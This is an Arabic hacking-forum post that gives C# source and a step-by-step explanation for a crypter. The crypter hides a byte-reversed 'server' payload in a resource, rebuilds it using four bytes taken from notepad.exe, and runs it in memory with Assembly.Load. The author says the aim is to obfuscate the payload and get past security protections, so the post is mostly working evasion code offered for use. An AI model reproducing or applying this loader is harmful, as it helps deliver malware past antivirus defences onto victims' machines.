11.05.2017 Tricks For AddOffests


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,571
2,967
1
ياريت تشوفو المواضيع السابقه اللي الها صلة بهالموضوع قبل ياشباب

السورس هنا

C#:
static void Main()
        {
            ALL();
        }
        public static byte[] gg(byte[] b, byte[] c)
        {
            byte[] total = new byte[b.Length + c.Length];
            Buffer.BlockCopy(b, 0, total, 0, b.Length);
            Buffer.BlockCopy(c, 0, total, b.Length, c.Length);
            return total;
        }
        public static byte[] hh(byte[] bb)
        {
            var test2 = new byte[16896];
            Array.Copy(bb, 10007168, test2, 0, test2.Length);
            return test2;
        }
        public static byte[] Microsoft()
        {
            var resource = Properties.Resources.bashar;
            return resource;
        }
        public static  byte[] take()
        {
           var add = File.ReadAllBytes(@"C:\Windows\notepad.exe").Skip(0).Take(4).ToArray();
            return add;
        }
        public static byte[] bb(byte[] bb)
        {
            Array.Reverse(bb, 0, bb.Length); return bb;
        }
        public static void ALL()
        {
            System.Reflection.Assembly.Load(hh(gg(take(), bb(Microsoft())))).EntryPoint.Invoke(null, null);
        }


المختصر للشرح هو التالي
1
C#:
public static byte[] hh(byte[] bb)
      {
          var test2 = new byte[16896];
          Array.Copy(bb, 10007168, test2, 0, test2.Length);
          return test2;
      }
عملنا فانكشن محتواها انه بيتم نسخ من مصفوفة بايت bb الى مصفوفة بايت اخرى test2
بيتم وضع فيها اوفستات السيرفر الاصلي بعد مانستبعد اللي ضفانهم بالهكس + اوفستات الملف الاصلي
مارح تفهم لتشوف الفديو لاتحاول مابينشرح كلام والله
2

C#:
public static byte[] gg(byte[] b, byte[] c)
      {
          byte[] total = new byte[b.Length + c.Length];
          Buffer.BlockCopy(b, 0, total, 0, b.Length);
          Buffer.BlockCopy(c, 0, total, b.Length, c.Length);
          return total;
      }
فنكشن مهمتها جمع مصفوفتين
اول مصفوفة اول بايت هو الملف بالريسورس
او ان بدك بتستفيد من هالموضوع بتعرف البايت الاول هو ناتج الموضوع هذا
Load Your Server From The Link [Load Directly In Memory]
ان مابدك ريسورس مع ان الناتج كلين مع الريسورس بطريقتنا
المهم قلنا انه هذه فانكشن لجمع مصفوفتين
طيب مين المصفوفة الثانية منو البايت الثاني
3
C#:
public static  byte[] take()
      {
         var add = File.ReadAllBytes(@"C:\Windows\notepad.exe").Skip(0).Take(4).ToArray();
          return add;
      }
البايت الثاني هو جلب اول اربع اوفستات من اي ملف من الويندوز انا اخترت نوت باد
طيب ليش ليجلبهم لانني طبقت فكرة موضوعي الفوق
وانقصت من اوفستات الملف ماسيتم جلبه من النوت باد
ليش .؟ عشان التشفير
4
C#:
public static byte[] bb(byte[] bb)
        {
            Array.Reverse(bb, 0, bb.Length); return bb;
        }
قمت بعكس بايتات الملف بعد ماحذفت اول4 اوفستات له
واعدت كتابته على الهارد
وهذه الفانكشن لاعادة بايتات السيرفر لوضعه الاصلي
وبايتات السيرفر متمثلة بالفانكشن
5
C#:
public static byte[] Microsoft()
        {
            var resource = Properties.Resources.bashar;
            return resource;
        }
اعتقد واضحه بيرجع لنا البايت واللي هوة الريسورس
6
C#:
public static void ALL()
        {
            System.Reflection.Assembly.Load(hh(gg(take(), bb(Microsoft())))).EntryPoint.Invoke(null, null);
        }
فانكشن مهمتها انها تشغل لنا كل ماسبق
ملاحظة رح تشتغل كل الفانكشنات باللود بالذاكرة
بيتنفذ حسب مشايفين جوا اللود
اولا hh تحديد مكان بدء نسخ المصفوفة او الاوفستات من الاوفست اللي ببلش عنده سيرفرنا
ثانيا gg جمع ناتج المصفوفتين الناتجين عن
ثالثا take اخذ اول اربع اوفستات من النوت باد وجمعها مع
رابعا bb عكس قيمة بايتات الملف اللي عكسناها سابقا والمتمثلة ب
خامسا Microsoft الريسورس وهو يمثل الملف المعكوسة بايتاته سابقا كما ذكرت
سادسا ALL بيتم تنفيذ 5 فانكشنات باللود بالذاكرة
سابعا بيتم استدعاء فانكشن ALL بالماين الرئيسية للبرنامج
يعني مامنكتب شي بالماين كله فانكشنات ومنفذهم باللود
الامر كله هذا عشان التشفير وتدويخ الحمايات وووو
الناتج ملف واحد بيشتغل بدون حاجة لملف بجانبه
وايضا تسلاية لي سويتها اليوم
الفديو بالمرفقات

 

المرفقات

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك